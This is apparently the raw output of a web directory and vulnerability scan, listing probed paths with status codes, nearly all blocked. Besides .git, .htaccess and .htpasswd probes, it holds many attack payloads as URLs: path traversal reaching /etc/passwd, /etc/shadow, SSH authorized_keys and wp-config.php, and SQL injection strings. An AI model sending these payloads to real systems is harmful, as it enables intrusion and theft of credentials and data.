/.git-credentials     (Status: 403) [Size: 552]
/.git-rewrite/        (Status: 403) [Size: 552]
/.git/                (Status: 403) [Size: 552]
/.git.json            (Status: 403) [Size: 552]
/.git/COMMIT_EDITMSG  (Status: 403) [Size: 552]
/.git/branches/       (Status: 403) [Size: 552]
/.git/config          (Status: 403) [Size: 552]
/.git/description     (Status: 403) [Size: 552]
/.git/configf         (Status: 403) [Size: 552]
/.git/FETCH_HEAD      (Status: 403) [Size: 552]
/.git/head            (Status: 403) [Size: 552]
/.git/index           (Status: 403) [Size: 552]
/.git/info/           (Status: 403) [Size: 552]
/.git/hooks/          (Status: 403) [Size: 552]
/.git/info/attributes (Status: 403) [Size: 552]
/.git/info/exclude    (Status: 403) [Size: 552]
/.git/logs/head       (Status: 403) [Size: 552]
/.git/logs/           (Status: 403) [Size: 552]
/.git/logs/refs/heads/master (Status: 403) [Size: 552]
/.git/logs/refs       (Status: 403) [Size: 552]
/.git/logs/refs/heads (Status: 403) [Size: 552]
/.git/logs/refs/remotes/origin (Status: 403) [Size: 552]
/.git/logs/refs/remotes/origin/HEAD (Status: 403) [Size: 552]
/.git/logs/refs/remotes (Status: 403) [Size: 552]
/.git/logs/refs/remotes/origin/master (Status: 403) [Size: 552]
/.git/refs/           (Status: 403) [Size: 552]
/.git/objects/        (Status: 403) [Size: 552]
/.git/packed-refs     (Status: 403) [Size: 552]
/.git/refs/heads      (Status: 403) [Size: 552]
/.git/refs/heads/master (Status: 403) [Size: 552]
/.git/refs/remotes    (Status: 403) [Size: 552]
/.git/refs/remotes/origin (Status: 403) [Size: 552]
/.git/refs/tags       (Status: 403) [Size: 552]
/.git2/               (Status: 403) [Size: 552]
/.git/refs/remotes/origin/HEAD (Status: 403) [Size: 552]
/.git/refs/remotes/origin/master (Status: 403) [Size: 552]
/.github/             (Status: 403) [Size: 552]
/.gitchangelog.rc     (Status: 403) [Size: 552]
/.github/ISSUE_TEMPLATE.md (Status: 403) [Size: 552]
/.github/PULL_REQUEST_TEMPLATE.md (Status: 403) [Size: 552]
/.github/workflows/blank.yml (Status: 403) [Size: 552]
/.github/workflows/ci.yml (Status: 403) [Size: 552]
/.github/workflows/dependabot.yml (Status: 403) [Size: 552]
/.github/workflows/master.yml (Status: 403) [Size: 552]
/.github/workflows/maven.yml (Status: 403) [Size: 552]
/.github/workflows/nodejs.yml (Status: 403) [Size: 552]
/.github/workflows/docker.yml (Status: 403) [Size: 552]
/.github/workflows/publish.yml (Status: 403) [Size: 552]
/.gitignore.swp       (Status: 403) [Size: 552]
/.gitignore.orig      (Status: 403) [Size: 552]
/.gitignore/          (Status: 403) [Size: 552]
/.gitlab              (Status: 403) [Size: 552]
/.gitlab-ci.off.yml   (Status: 403) [Size: 552]
/.gitlab-ci.yml       (Status: 403) [Size: 552]
/.gitlab-ci/.env      (Status: 403) [Size: 552]
/.htaccess-local      (Status: 403) [Size: 552]
/.htaccess.bak        (Status: 403) [Size: 552]
/.htaccess-dev        (Status: 403) [Size: 552]
/.htaccess-marco      (Status: 403) [Size: 552]
/.htaccess.bak1       (Status: 403) [Size: 552]
/.htaccess.inc        (Status: 403) [Size: 552]
/.htaccess.old        (Status: 403) [Size: 552]
/.htaccess.sample     (Status: 403) [Size: 552]
/.htaccess.orig       (Status: 403) [Size: 552]
/.htaccess.save       (Status: 403) [Size: 552]
/.htaccess.txt        (Status: 403) [Size: 552]
/.htaccess/           (Status: 403) [Size: 552]
/.htaccessBAK         (Status: 403) [Size: 552]
/.htpasswd-old        (Status: 403) [Size: 552]
/.htpasswd.bak        (Status: 403) [Size: 552]
/.htaccessOLD         (Status: 403) [Size: 552]
/.htpasswd.inc        (Status: 403) [Size: 552]
/.htaccessOLD2        (Status: 403) [Size: 552]
/.htpasswd/           (Status: 403) [Size: 552]
/.httr-oauth          (Status: 403) [Size: 552]
/.well-known/apple-app-site-association (Status: 200) [Size: 666]
/.well-known/assetlinks.json (Status: 200) [Size: 1122]
/%2e%2e//google.com   (Status: 400) [Size: 122]
/admin/.htaccess      (Status: 403) [Size: 552]
/administrator/.htaccess (Status: 403) [Size: 552]
/app/.htaccess        (Status: 403) [Size: 552]
/url?para=//..//..//..//..//..//..//..//..//etc//passwd// (Status: 403) [Size: 552]
//server/logs/download?logType=error&logName=../../../../../../../../etc/shadow&logSource=engine (Status: 403) [Size: 552]
//gui/file_viewer.php?encrypt=N&target_folder=utilities&uploaded_filename=../../../../../../../etc/passwd (Status: 403) [Size: 552]
//_session_start_/%0atest (Status: 400) [Size: 556]
//wp—admin/admin—ajax.php?action=duplicator_download&file=/../wp-config.php (Status: 403) [Size: 552]
//.git/config         (Status: 403) [Size: 552]
/modx/assets/cache/docid_1/../../../../../../../etc/passwd\0.pagecache.php (Status: 400) [Size: 122]
/my_keys&dst=../../../root/.ssh/authorized_keys (Status: 400) [Size: 122]
/votes/../../admin/multiuser/multiuser.php (Status: 400) [Size: 122]
/signezui/playlist/edit/upload/../../../../../../../../../../etc/passwd (Status: 400) [Size: 122]
//index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd (Status: 403) [Size: 552]
//jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd (Status: 400) [Size: 122]
//.%0d./.%0d./.%0d./.%0d./bin/sh (Status: 400) [Size: 556]
//./../../../../../../../../../../etc/shadow (Status: 400) [Size: 122]
//?BaZar&vue=exporter&id=-1 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15# (Status: 403) [Size: 552]
//?category=&s=1%20and%20extractvalue(rand(),concat(0x7e,version()))&search_posttype=product (Status: 403) [Size: 552]
//?objGroupID=%31%32%27%7c%7c%28SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20%28seLEcT%20112%20frOM(SElecT%20CouNT(*)%2cConCAT%28CONcat(0x203a20%2cUseR()%2cDAtaBASe()%2cVErsION())%2c(SeLEct%20%28ELT(112=112%2c1%29%29%29%2cFLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x%29a%29%29%7c%7c%27 (Status: 403) [Size: 552]
//WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=../../../../../../../../etc/passwd (Status: 403) [Size: 552]
//_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected (Status: 403) [Size: 552]
//catalog.php?filename=../../../../../../../../../etc/passwd (Status: 403) [Size: 552]
//cgi-bin/w3-msql/protected-directory/.htpasswd (Status: 403) [Size: 552]
//css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 400) [Size: 122]
//dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ (Status: 400) [Size: 122]
//gilacms/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts (Status: 403) [Size: 552]
//index.php?m=admin&c=custom&a=themeexporthandle&theme_name=../../../etc/passwd (Status: 403) [Size: 552]
//js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 400) [Size: 122]
//kmrs/exportmanager/ajax/getfiles?f=/../../../../../../../../../../proc/version (Status: 403) [Size: 552]
//lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 400) [Size: 122]
//pages.php?id=2%27%20AND%20(SELECT%204588%20FROM(SELECT%20COUNT(*),CONCAT(0x3a3a,user(),0x3a3a,database(),0x3a3a,version(),0x3a3a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20- (Status: 403) [Size: 552]
//pagina.phtml?explode_tree=-1'/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/ database()),0x3a7333783075))--+- (Status: 403) [Size: 552]
//pagina.phtml?explode_tree=-1%27/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+- (Status: 403) [Size: 552]
//remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession (Status: 403) [Size: 552]
//res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd (Status: 400) [Size: 122]
//servlets/FileUploadServlet?fileName=../jsp/Login.jsp (Status: 403) [Size: 552]
//wp-admin/admin-ajax.php?action=../../../../../index.php (Status: 403) [Size: 552]
//wp-admin/admin-ajax.php?action=/../../../../../../index (Status: 403) [Size: 552]
//wp-admin/edit.php?post_type=wd_ads_ads&export=export_csv&path=../wp-config.php (Status: 403) [Size: 552]
//wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd (Status: 403) [Size: 552]
//wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd (Status: 403) [Size: 552]
//xyz/../../ThinVnc.ini (Status: 400) [Size: 122]
//.git                (Status: 403) [Size: 552]
//../agc/bp.pl        (Status: 400) [Size: 122]
//spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log (Status: 403) [Size: 552]
//.%0d./.%0d./.%0d./.%0d./bin/sh (Status: 400) [Size: 556]
